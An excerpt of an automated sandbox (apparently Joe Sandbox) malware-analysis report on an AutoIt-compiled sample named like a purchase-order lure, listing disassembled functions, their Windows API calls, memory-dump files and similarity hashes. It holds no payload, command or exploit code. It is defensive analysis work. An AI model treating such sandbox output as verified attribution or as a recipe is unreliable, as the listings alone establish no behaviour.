                          Function 00F60B15 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON
                          Download Yara Rule
                          APIs
                          • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00F60B23
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Message
                          • String ID: AutoIt$Error allocating memory.
                          • API String ID: 2030045667-4017498283
                          • Opcode ID: 976de41464900a81922a8aade19f655c829fff222e0f782d17c4f814aaae2f71
                          • Instruction ID: 3bdfca9ca970ec07a54cb95f958300aee48f55cbc0ff9b29f53ae6d7d23f157a
                          • Opcode Fuzzy Hash: 976de41464900a81922a8aade19f655c829fff222e0f782d17c4f814aaae2f71
                          • Instruction Fuzzy Hash: 00E0483124431836E61437947C03FD97A848F05F61F10446AF758955C38EE5649076EA
                          Function 00F20D42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00F1F7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00F20D71,?,?,?,00F0100A), ref: 00F1F7CE
                          • IsDebuggerPresent.KERNEL32(?,?,?,00F0100A), ref: 00F20D75
                          • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00F0100A), ref: 00F20D84
                          Strings
                          • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00F20D7F
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                          • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                          • API String ID: 55579361-631824599
                          • Opcode ID: 5c59cf45b32416584bd5a07c5d84067b8d3418049c3bf420a738a091495e0af8
                          • Instruction ID: 0f915fa9ec91f7076d85e9878382d94a4345fcbd3dd82e852412428f1dd036da
                          • Opcode Fuzzy Hash: 5c59cf45b32416584bd5a07c5d84067b8d3418049c3bf420a738a091495e0af8
                          • Instruction Fuzzy Hash: 71E092702013118BE730AFB8E8047427BE0BF00740F40492EE482C6692DFB5E448BBD1
                          Function 00F5D21C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: LocalTime
                          • String ID: %.3d$X64
                          • API String ID: 481472006-1077770165
                          • Opcode ID: 5cc2f9ece2a02e24a748909911240b7e735949f477e88af09acf6cfbd68f2a17
                          • Instruction ID: 78b3c57b55da967874ec41d07409ed908df252fa0efe1e2dd898c9293737a6db
                          • Opcode Fuzzy Hash: 5cc2f9ece2a02e24a748909911240b7e735949f477e88af09acf6cfbd68f2a17
                          • Instruction Fuzzy Hash: E6D0627680A159E9CB6097D0DD45AF9B37CAB59342F508456FE06D1040D624D54CBB62
                          Function 00F92356 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                          Download Yara Rule
                          APIs
                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00F9236C
                          • PostMessageW.USER32(00000000), ref: 00F92373
                            • Part of subcall function 00F6E97B: Sleep.KERNEL32 ref: 00F6E9F3
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: FindMessagePostSleepWindow
                          • String ID: Shell_TrayWnd
                          • API String ID: 529655941-2988720461
                          • Opcode ID: 2bc0a0cee0aa2842de68a9d0ef5ba48687807ff34d06754fa346de5402890b09
                          • Instruction ID: f6838c43041b89d3704c591527d1bd25ef21b92dd6d487e2eab733b45811963f
                          • Opcode Fuzzy Hash: 2bc0a0cee0aa2842de68a9d0ef5ba48687807ff34d06754fa346de5402890b09
                          • Instruction Fuzzy Hash: 81D0C9363853147AE664A7709D0FFC676249F44B10F0149167745EA1D4C9A4A8119A94
                          Function 00F92322 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                          Download Yara Rule
                          APIs
                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00F9232C
                          • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00F9233F
                            • Part of subcall function 00F6E97B: Sleep.KERNEL32 ref: 00F6E9F3
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: FindMessagePostSleepWindow
                          • String ID: Shell_TrayWnd
                          • API String ID: 529655941-2988720461
                          • Opcode ID: d5c379a07c95892a4eaf4b351310d13ea98837ef9a40456828ab8c3551b25c04
                          • Instruction ID: 1a6afbdea35d084989b3789b1a6fef974e638eb5a4b6e4a3ce1260b45c539905
                          • Opcode Fuzzy Hash: d5c379a07c95892a4eaf4b351310d13ea98837ef9a40456828ab8c3551b25c04
                          • Instruction Fuzzy Hash: F5D01236394314B7E664B770DD0FFC67A249F40B10F0149177749EA1D4C9F4A811DA94
                          Function 00F3BDFD Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 00F3BE93
                          • GetLastError.KERNEL32 ref: 00F3BEA1
                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00F3BEFC
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: ByteCharMultiWide$ErrorLast
                          • String ID:
                          • API String ID: 1717984340-0
                          • Opcode ID: a7addb7ca293429f4449b4fe44bd56112fc1754dfcae371a0b4c5452d1ffbad4
                          • Instruction ID: f716bfc91cf1bb27cb7cb95899a820b41b8f94791149c8c655241df6dbbfea8c
                          • Opcode Fuzzy Hash: a7addb7ca293429f4449b4fe44bd56112fc1754dfcae371a0b4c5452d1ffbad4
                          • Instruction Fuzzy Hash: 0541E935A04216AFCF218FB8DC64BBA7BA5EF41330F145169FA599B1A1DB308D40FB60